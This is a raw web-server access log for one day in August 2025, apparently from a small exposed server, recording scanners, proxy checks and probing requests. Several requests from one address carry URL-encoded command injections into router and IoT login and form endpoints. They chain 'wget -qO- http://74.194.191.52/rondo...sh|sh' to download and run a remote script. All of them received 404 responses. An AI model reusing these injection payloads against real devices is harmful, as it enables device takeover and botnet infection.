199.204.96.10 - - [10/Aug/2025:00:15:34 +0200] "GET / HTTP/1.1" 200 1895 107.170.5.138 - - [10/Aug/2025:00:23:17 +0200] "-" 400 1930 107.170.5.138 - - [10/Aug/2025:00:23:18 +0200] "-" 400 1930 107.170.5.138 - - [10/Aug/2025:00:23:18 +0200] "GET / HTTP/1.1" 200 1895 107.170.5.138 - - [10/Aug/2025:00:23:18 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 107.170.5.138 - - [10/Aug/2025:00:23:18 +0200] "GET /get.php HTTP/1.1" 404 725 176.65.148.236 - - [10/Aug/2025:00:36:30 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 68.69.186.238 - - [10/Aug/2025:01:32:00 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.230 - - [10/Aug/2025:01:33:55 +0200] "GET / HTTP/1.1" 200 1895 44.220.188.98 - - [10/Aug/2025:02:29:40 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.82 - - [10/Aug/2025:02:33:54 +0200] "GET / HTTP/1.1" 200 1895 68.69.186.238 - - [10/Aug/2025:02:46:44 +0200] "GET / HTTP/1.1" 200 1895 196.251.89.45 - - [10/Aug/2025:02:48:00 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 199.204.96.10 - - [10/Aug/2025:02:56:10 +0200] "GET / HTTP/1.1" 200 1895 45.156.87.165 - - [10/Aug/2025:03:01:13 +0200] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 199.204.96.26 - - [10/Aug/2025:03:07:09 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.57 - - [10/Aug/2025:03:17:26 +0200] "-" 400 1930 45.156.87.165 - - [10/Aug/2025:03:19:38 +0200] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 45.156.87.165 - - [10/Aug/2025:03:28:21 +0200] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 185.91.127.107 - - [10/Aug/2025:04:17:12 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 400 804 185.91.127.107 - - [10/Aug/2025:04:17:12 +0200] "-" 400 1930 185.91.127.107 - - [10/Aug/2025:04:17:28 +0200] "-" 400 1930 185.91.127.107 - - [10/Aug/2025:04:17:28 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 400 804 68.69.186.238 - - [10/Aug/2025:04:25:54 +0200] "GET / HTTP/1.1" 200 1895 45.95.147.173 - - [10/Aug/2025:04:29:17 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 209.38.144.40 - - [10/Aug/2025:04:29:18 +0200] "-" 400 1930 45.156.87.165 - - [10/Aug/2025:05:14:23 +0200] "GET null HTTP/1.1" 400 1994 45.156.87.165 - - [10/Aug/2025:05:16:21 +0200] "GET null HTTP/1.1" 400 1994 185.242.226.25 - - [10/Aug/2025:05:30:35 +0200] "-" 400 1930 45.156.87.165 - - [10/Aug/2025:05:44:25 +0200] "POST /setSystemCommand HTTP/1.1" 404 734 167.94.145.108 - - [10/Aug/2025:06:03:48 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.108 - - [10/Aug/2025:06:03:51 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.108 - - [10/Aug/2025:06:03:51 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.145.108 - - [10/Aug/2025:06:03:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 167.94.145.108 - - [10/Aug/2025:06:03:58 +0200] "-" 400 1930 167.94.145.108 - - [10/Aug/2025:06:03:58 +0200] "GET /robots.txt HTTP/1.1" 404 728 198.235.24.73 - - [10/Aug/2025:06:09:06 +0200] "GET / HTTP/1.0" 200 1895 45.156.87.165 - - [10/Aug/2025:06:16:19 +0200] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.bxd.sh%7Csh%26echo%20&password=asdf HTTP/1.1" 404 751 45.156.87.165 - - [10/Aug/2025:06:24:14 +0200] "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.jjw.sh%7Csh%3B%27 HTTP/1.1" 404 736 80.75.212.17 - - [10/Aug/2025:06:30:13 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 400 804 68.69.186.238 - - [10/Aug/2025:06:50:00 +0200] "GET / HTTP/1.1" 200 1895 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:04 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:05 +0200] "-" 400 1930 157.245.35.75 - - [10/Aug/2025:07:29:05 +0200] "-" 400 1930 68.69.186.238 - - [10/Aug/2025:07:55:08 +0200] "GET / HTTP/1.1" 200 1895 185.242.226.25 - - [10/Aug/2025:08:13:24 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.57 - - [10/Aug/2025:08:20:53 +0200] "-" 400 1930 68.69.186.238 - - [10/Aug/2025:08:53:15 +0200] "GET / HTTP/1.1" 200 1895 196.251.70.139 - - [10/Aug/2025:08:53:21 +0200] "-" 400 1930 178.128.84.187 - - [10/Aug/2025:09:18:32 +0200] "GET /aaa9 HTTP/1.1" 404 722 178.128.84.187 - - [10/Aug/2025:09:18:34 +0200] "GET /aab8 HTTP/1.1" 404 722 178.128.84.187 - - [10/Aug/2025:09:18:36 +0200] "GET / HTTP/1.1" 200 1895 3.143.33.63 - - [10/Aug/2025:09:25:17 +0200] "GET / HTTP/1.1" 200 1895 3.143.33.63 - - [10/Aug/2025:09:29:18 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.226 - - [10/Aug/2025:09:30:12 +0200] "GET / HTTP/1.0" 200 1895 3.143.33.63 - - [10/Aug/2025:09:30:13 +0200] "-" 400 1930 172.235.181.226 - - [10/Aug/2025:09:30:18 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.226 - - [10/Aug/2025:09:30:18 +0200] "GET /webui HTTP/1.1" 404 723 172.235.181.226 - - [10/Aug/2025:09:30:18 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.226 - - [10/Aug/2025:09:30:18 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.235.181.226 - - [10/Aug/2025:09:30:18 +0200] "GET / HTTP/1.1" 200 1895 172.235.181.226 - - [10/Aug/2025:09:30:19 +0200] "GET /owa/ HTTP/1.1" 404 726 172.235.181.226 - - [10/Aug/2025:09:30:19 +0200] "GET /owa/ HTTP/1.1" 404 726 172.235.181.226 - - [10/Aug/2025:09:30:28 +0200] "-" 400 1930 172.235.181.226 - - [10/Aug/2025:09:30:38 +0200] "GET / HTTP/1.0" 200 1895 172.235.181.226 - - [10/Aug/2025:09:30:38 +0200] "GET / HTTP/1.1" 200 1895 3.143.33.63 - - [10/Aug/2025:09:32:08 +0200] "-" 400 1930 3.143.33.63 - - [10/Aug/2025:09:34:14 +0200] "-" 400 1930 18.207.93.126 - - [10/Aug/2025:09:55:29 +0200] "GET / HTTP/1.1" 200 1895 178.238.236.27 - - [10/Aug/2025:10:01:25 +0200] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 771 87.120.191.6 - - [10/Aug/2025:11:19:09 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.68 - - [10/Aug/2025:11:25:51 +0200] "GET / HTTP/1.1" 200 1895 216.218.206.124 - - [10/Aug/2025:11:26:34 +0200] "GET /favicon.ico HTTP/1.1" 404 729 216.218.206.100 - - [10/Aug/2025:11:26:46 +0200] "GET /?format=json HTTP/1.1" 200 1895 216.218.206.116 - - [10/Aug/2025:11:26:56 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 216.218.206.68 - - [10/Aug/2025:11:27:08 +0200] "GET /geoserver/web/ HTTP/1.1" 404 740 79.127.132.162 - - [10/Aug/2025:11:27:19 +0200] "CONNECT upload.wikimedia.org:443 HTTP/1.1" 400 804 185.91.127.107 - - [10/Aug/2025:11:35:38 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 400 804 185.91.127.107 - - [10/Aug/2025:11:35:38 +0200] "-" 400 1930 68.69.186.238 - - [10/Aug/2025:11:55:22 +0200] "GET / HTTP/1.1" 200 1895 5.181.2.18 - - [10/Aug/2025:12:21:35 +0200] "GET / HTTP/1.1" 200 1895 68.69.186.238 - - [10/Aug/2025:13:42:27 +0200] "GET / HTTP/1.1" 200 1895 123.245.85.223 - - [10/Aug/2025:14:10:01 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.57 - - [10/Aug/2025:14:10:13 +0200] "-" 400 1930 123.191.134.228 - - [10/Aug/2025:14:10:56 +0200] "GET / HTTP/1.1" 200 1895 139.212.69.114 - - [10/Aug/2025:14:10:57 +0200] "GET /favicon.ico HTTP/1.1" 404 729 20.169.105.90 - - [10/Aug/2025:14:15:31 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.108 - - [10/Aug/2025:14:32:20 +0200] "-" 400 1930 185.91.127.107 - - [10/Aug/2025:15:13:29 +0200] "-" 400 1930 185.91.127.107 - - [10/Aug/2025:15:13:29 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 400 804 199.204.96.26 - - [10/Aug/2025:15:35:19 +0200] "GET / HTTP/1.1" 200 1895 44.220.188.254 - - [10/Aug/2025:15:37:55 +0200] "GET / HTTP/1.1" 200 1895 68.69.186.238 - - [10/Aug/2025:15:46:19 +0200] "GET / HTTP/1.1" 200 1895 176.65.149.159 - - [10/Aug/2025:16:02:00 +0200] "GET /login HTTP/1.1" 404 723 82.208.21.231 - - [10/Aug/2025:16:23:42 +0200] "GET / HTTP/1.1" 200 1895 43.230.159.241 - - [10/Aug/2025:16:36:57 +0200] "GET / HTTP/1.1" 200 1895 199.204.96.10 - - [10/Aug/2025:17:03:58 +0200] "GET / HTTP/1.1" 200 1895 95.161.222.233 - - [10/Aug/2025:17:28:00 +0200] "GET / HTTP/1.1" 200 1895 199.204.96.10 - - [10/Aug/2025:18:04:15 +0200] "GET / HTTP/1.1" 200 1895 66.29.138.162 - - [10/Aug/2025:18:51:30 +0200] "GET / HTTP/1.1" 200 1895 199.204.96.26 - - [10/Aug/2025:18:57:20 +0200] "GET / HTTP/1.1" 200 1895 185.91.127.107 - - [10/Aug/2025:18:59:01 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 400 804 185.91.127.107 - - [10/Aug/2025:18:59:01 +0200] "-" 400 1930 178.128.84.112 - - [10/Aug/2025:19:00:57 +0200] "GET /aaa9 HTTP/1.1" 404 722 178.128.84.112 - - [10/Aug/2025:19:01:03 +0200] "GET /aab8 HTTP/1.1" 404 722 178.128.84.112 - - [10/Aug/2025:19:01:10 +0200] "GET / HTTP/1.1" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.0" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.0" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "POST /sdk HTTP/1.1" 404 721 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.1" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "POST / HTTP/1.1" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET /robots.txt HTTP/1.1" 404 728 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET /.git/HEAD HTTP/1.1" 404 731 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET /nmaplowercheck1754847350 HTTP/1.1" 404 742 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.0" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "PROPFIND / HTTP/1.1" 501 742 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "PROPFIND / HTTP/1.1" 501 742 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "PROPFIND / HTTP/1.1" 501 742 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET /HNAP1 HTTP/1.1" 404 723 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "XDOH / HTTP/1.1" 501 738 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "HEAD / HTTP/1.0" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.1" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET /evox/about HTTP/1.1" 404 732 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "CONNECT www.google.com:80 HTTP/1.0" 400 804 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.0" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET /favicon.ico HTTP/1.1" 404 729 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "HEAD / HTTP/1.0" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "CONNECT www.wikipedia.org:80 HTTP/1.0" 400 804 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.0" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "CONNECT www.computerhistory.org:80 HTTP/1.0" 400 804 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "OPTIONS / HTTP/1.1" 200 - 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.0" 200 1895 194.5.73.5 - - [10/Aug/2025:19:36:01 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.57 - - [10/Aug/2025:19:39:22 +0200] "-" 400 1930 176.65.149.159 - - [10/Aug/2025:19:42:50 +0200] "GET /login HTTP/1.1" 404 723 90.151.171.106 - - [10/Aug/2025:19:56:27 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 90.151.171.106 - - [10/Aug/2025:19:56:33 +0200] "-" 400 1930 90.151.171.106 - - [10/Aug/2025:19:56:38 +0200] "GET /?Z79065299362Q1 HTTP/1.1" 200 1895 90.151.171.106 - - [10/Aug/2025:19:56:43 +0200] "-" 400 1930 196.251.89.45 - - [10/Aug/2025:20:36:51 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 196.251.89.45 - - [10/Aug/2025:20:36:51 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 199.204.96.26 - - [10/Aug/2025:20:43:21 +0200] "GET / HTTP/1.1" 200 1895 135.237.126.244 - - [10/Aug/2025:20:55:58 +0200] "-" 400 1930 45.156.87.165 - - [10/Aug/2025:21:21:24 +0200] "GET /login.cgi?cli=multilingual%20show%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zta.sh%7Csh%27%24 HTTP/1.1" 404 727 139.59.95.107 - - [10/Aug/2025:22:04:49 +0200] "-" 400 1930 139.59.95.107 - - [10/Aug/2025:22:04:49 +0200] "-" 400 1930 139.59.95.107 - - [10/Aug/2025:22:04:50 +0200] "GET / HTTP/1.1" 200 1895 139.59.95.107 - - [10/Aug/2025:22:04:50 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 139.59.95.107 - - [10/Aug/2025:22:04:50 +0200] "GET /get.php HTTP/1.1" 404 725 199.204.96.10 - - [10/Aug/2025:22:09:56 +0200] "GET / HTTP/1.1" 200 1895 66.29.138.162 - - [10/Aug/2025:22:20:48 +0200] "GET / HTTP/1.1" 200 1895 185.91.127.107 - - [10/Aug/2025:22:45:22 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 400 804 185.91.127.107 - - [10/Aug/2025:22:45:22 +0200] "-" 400 1930 199.204.96.26 - - [10/Aug/2025:22:55:41 +0200] "GET / HTTP/1.1" 200 1895 45.134.26.82 - - [10/Aug/2025:22:58:51 +0200] "-" 400 1930 199.204.96.10 - - [10/Aug/2025:23:17:11 +0200] "GET / HTTP/1.1" 200 1895 45.79.207.181 - - [10/Aug/2025:23:33:17 +0200] "GET / HTTP/1.1" 200 1895 66.228.53.4 - - [10/Aug/2025:23:33:29 +0200] "GET / HTTP/1.1" 200 1895